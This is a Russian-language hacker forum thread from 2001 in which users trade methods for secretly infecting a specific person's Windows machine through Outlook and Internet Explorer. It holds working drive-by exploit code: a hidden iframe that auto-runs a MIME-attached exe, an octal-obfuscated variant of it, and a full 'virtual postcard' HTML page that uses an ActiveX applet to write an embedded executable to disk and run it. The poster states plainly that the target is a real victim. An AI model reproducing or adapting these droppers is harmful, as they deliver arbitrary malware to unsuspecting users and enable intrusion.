Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| |
ищи на борде 13.12.01 16:26 Число просмотров: 1362
Автор: DmB Статус: Незарегистрированный пользователь
|
> недавно был такой вопрос и приводился даже полный текст
> письма... как тока юзер станет на писмьо аттач запускается
> (для IE 5.00-5.01 и может быть ниже)
> таким макаром размножается WORM_ALIZ.A, WORM_BADTRANS.B
Нашел. Far-ом сделал MIME код своего exe-шника. Для засылки использовал немного модифицированный SMTP-клиент
с http://www.sources.ru/cpp/cpp_mail_utilits.shtml (почтовые утилитки с исходниками). Однако SMTP моего прова ругается на это письмо (Ошибка 554), что там мол есть вирус Win32.Aliz и никуда письмо не шлет. Да сейчас у многих провайдеров исходящая/входящая почта проверяется.
Крутил-вертел эти строчки.
<iframe src=3Dcid:APPENDIX height=3D0 width=3D0></iframe>
...
--part_bound
Content-Type: text/plain;
name="test.exe"
Content-Transfer-Encoding: base64
Content-ID: <APPENDIX>
Первая строчка в варианте
<SCRIPT LANGUAGE="JAVASCRIPT"><!--
document.write("\74\151\146\162\141\155\145\40\163\162\143\75\63\104\143\151\144\72\101\120\120\105\116\104\111\130\40\150\145\151\147\150");
document.write("\164\75\63\104\60\40\167\151\144\164\150\75\63\104\60\76\74\57\151\146\162\141\155\145\76");
-->
вроде шлется. Но Outlook2000 (не Outlook Express) аттач не запускает.
|
|
<hacking>
|
Как заслать трояна через Outlook 21.11.01 12:56
Автор: DmB Статус: Незарегистрированный пользователь
|
Помогите, плиз!
Известен адрес е-почты, что человек пользуется Outlook (версия не известна).
Собсно, нужен готовый exploit для запуска приаттаченного exe, использующий дыры JavaScript и VB. С этими вещами я как раз и не имел дела, а изучать их нет времени. Виндовский ехе-шник на 2 - 5кБ я могу написать сам.
На всякие "readme.exe" и "my.jpg___.exe" рассчитывать не приходится -жертва не идиот. Письмо, скорее, пойдет в виде псевдоспама и после заражения машины пользователь удалит его сам.
Буду рад, если зашлете конкретные ссылки на dbak@newmail.ru
|
|
Вариант №2 13.12.01 16:46
Автор: DmB Статус: Незарегистрированный пользователь
|
Вариант №2. Тоже нашел на форуме. Это как раз работает.
На халявном сервере заводится страница (см. текст ниже) 7654321.html. В примере лежит безобидный ехе-шник на 1,5 кб, выдающий MessageBox: "It's really working!".
В html делаем "виртуальную открытку" и шлем клиенту письмо "С нашего сервера Вам послали открытку + ссылка".
При просмотре "открытки" создается и запускается ехе.
----------------------------------------
<HTML><HEAD>
<META NAME="GENERATOR" Content="Outlook">
<META HTTP-EQUIV="Content-Type" content="text/html; charset=windows-1251">
<TITLE>Document Title</TITLE></HEAD>
<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
<SCRIPT LANGUAGE="JAVASCRIPT"><!--
var Shl,Fhl;
function initinst()
{
alert("initinst");
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl=a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
Fhl=a1.GetObject();
}
setTimeout("initinst()",500);
function createandrun()
{
f1 = Fhl.CreateTextFile("..\\msstf.exe",true);
f1.Write("MZP\0\1\0\0\0\4\0\0\0 \0\0╕\0\0\0\0\0\0\0@\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Ш\0\0\0");
f1.Write("├\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0я\42Ё\20лCЮCлCЮCлCЮC");
f1.Write("лCЯCпCЮC╔\134НCоCЮCзcРCкCЮC^\134НCкCЮC");
f1.Write("RichлCЮC\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0PE\0\0L\1\2\0");
f1.Write("З\3\24<\0\0\0\0\0\0\0\0р\0\17\1\13\1\5\14\0\2\0\0\0\2\0\0\0\0\0\0");
f1.Write("\20\20\0\0\0\20\0\0\0 \0\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\1\0\0\0");
f1.Write("\4\0\0\0\0\0\0\0\0\60\0\0\0\2\0\0├т\0\0\2\0\0\0\0\20\0\0\0\20\0\0");
f1.Write("\0\20\0\0\0\20\0\0\0\0\0\0\20\0\0\0а \0\0\64\0\0\0\20 \0\0(\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\20\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.edata,.я\0\0\0\0\20\0\0");
f1.Write("\0\2\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0`.rdata\0\0");
f1.Write("╘\0\0\0\0 \0\0\0\2\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0@");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\10 @\0\4 @\0\0 @\0╚\20\0\0ш\0\0\0\0[Бу\0 ");
f1.Write("Й]№╕м\0\0\0\3E№P╕\4\0\0\0\3E№Л\0 \20ЙEЁ╕╣\0\0\0");
f1.Write("\3E№P╕\4\0\0\0\3E№Л\0 \20ЙEЇh@\0\0\0\63└P╗┌\0\0\0");
f1.Write("\3]№SP╕╬\0\0\0\3E№P uЇш\42\0\0\0 uЇ╕\14\0\0\0\3E");
f1.Write("№Л\0 \20 uЁ╕\14\0\0\0\3E№Л\0 \20\63└╔├YX[QSP╕\10");
f1.Write("\0\0\0\3E№Л\0 \20 рKERNEL\63\62.DLL\0USER\63\62.");
f1.Write("DLL\0GDI\63\62.DLL\0MessageBoxA\0It`s r");
f1.Write("eally working!\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("X \0\0f \0\0H \0\0\0\0\0\0\70 \0\0\0\0\0\0\0\0\0\0x \0\0");
f1.Write("\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0X \0\0f \0\0");
f1.Write("H \0\0\0\0\0\0┬\1LoadLibraryA\0\0┤\0FreeLi");
f1.Write("brary\0>\1GetProcAddress\0\0KERNEL\63\62");
f1.Write(".dll\0\0USER\63\62.dll\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0З\3\24<\0\0\0\0╚ \0\0\1\0\0\0\0\0\0\0\0\0\0\0╚ \0\0");
f1.Write("╚ \0\0╚ \0\0HANDLER.EXE\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Write("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
f1.Close();
Shl.Run("..\\msstf.exe");
}
setTimeout("createandrun();",1000);
--></SCRIPT>
<BODY><H1>Title</H1>
text<br>
</BODY>
</HTML>
|
|
ищи на борде 10.12.01 13:21
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
Отредактировано 10.12.01 13:22 Количество правок: 1
|
недавно был такой вопрос и приводился даже полный текст письма... как тока юзер станет на писмьо аттач запускается (для IE 5.00-5.01 и может быть ниже)
таким макаром размножается WORM_ALIZ.A, WORM_BADTRANS.B
|
| |
ищи на борде 13.12.01 16:26
Автор: DmB Статус: Незарегистрированный пользователь
|
> недавно был такой вопрос и приводился даже полный текст
> письма... как тока юзер станет на писмьо аттач запускается
> (для IE 5.00-5.01 и может быть ниже)
> таким макаром размножается WORM_ALIZ.A, WORM_BADTRANS.B
Нашел. Far-ом сделал MIME код своего exe-шника. Для засылки использовал немного модифицированный SMTP-клиент
с http://www.sources.ru/cpp/cpp_mail_utilits.shtml (почтовые утилитки с исходниками). Однако SMTP моего прова ругается на это письмо (Ошибка 554), что там мол есть вирус Win32.Aliz и никуда письмо не шлет. Да сейчас у многих провайдеров исходящая/входящая почта проверяется.
Крутил-вертел эти строчки.
<iframe src=3Dcid:APPENDIX height=3D0 width=3D0></iframe>
...
--part_bound
Content-Type: text/plain;
name="test.exe"
Content-Transfer-Encoding: base64
Content-ID: <APPENDIX>
Первая строчка в варианте
<SCRIPT LANGUAGE="JAVASCRIPT"><!--
document.write("\74\151\146\162\141\155\145\40\163\162\143\75\63\104\143\151\144\72\101\120\120\105\116\104\111\130\40\150\145\151\147\150");
document.write("\164\75\63\104\60\40\167\151\144\164\150\75\63\104\60\76\74\57\151\146\162\141\155\145\76");
-->
вроде шлется. Но Outlook2000 (не Outlook Express) аттач не запускает.
|
| | |
ищи на борде 18.12.01 03:07
Автор: lucker Статус: Незарегистрированный пользователь
|
|
Как сделать Mime код exe-шника ?
|
| | | |
ищи на борде 20.12.01 00:18
Автор: DmB Статус: Незарегистрированный пользователь
|
> Как сделать Mime код exe-шника ?
Есть плагин для Far MxUUE. Посмотри в поисковиках "Far Plug-in MxUUE".
На www.lycos.ru нашел первой строчкой, например, http://www.ag.ru/far/plugins.shtml.
Плагин позволяет кодировать-декодировать в/из MIME и UUE.
Если не найдешь :(, могу заслать мылом.
|
|
Как заслать трояна через Outlook 07.12.01 21:33
Автор: zuv Статус: Незарегистрированный пользователь
|
Попробуй так:
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<iframe src=3DОтносительный_адре_трояна height=3D0 width=3D0></iframe>
</iframe></BODY></HTML>
exe не используй, bat ...
Если OE не 6, а ниже то он даже не заметит.
Основан на том что парсеры большинства почтовых серверов не фильтруют ссылки src=3D....
> Помогите, плиз!
> Известен адрес е-почты, что человек пользуется Outlook
> (версия не известна).
> Собсно, нужен готовый exploit для запуска приаттаченного
> exe, использующий дыры JavaScript и VB. С этими вещами я
> как раз и не имел дела, а изучать их нет времени.
> Виндовский ехе-шник на 2 - 5кБ я могу написать сам.
>
> На всякие "readme.exe" и "my.jpg___.exe" рассчитывать не
> приходится -жертва не идиот. Письмо, скорее, пойдет в виде
> псевдоспама и после заражения машины пользователь удалит
> его сам.
>
> Буду рад, если зашлете конкретные ссылки на dbak@newmail.ru
|
| |
А как использовать данный скрипт ? 09.12.01 17:09
Автор: icehzr Статус: Незарегистрированный пользователь
|
|
|
| | |
А как использовать данный скрипт ? 09.12.01 21:04
Автор: Screamer Статус: Незарегистрированный пользователь
|
Друг, мыль на pashmen@mail.kz
разберёмся....
|
| | |
Используй по назначению - распечатай и на стену повесь :) 09.12.01 17:13
Автор: !mm <Ivan Ch.> Статус: Elderman
|
|
|
|
|
подробно о проекте
Анализ криптографических сетевых...
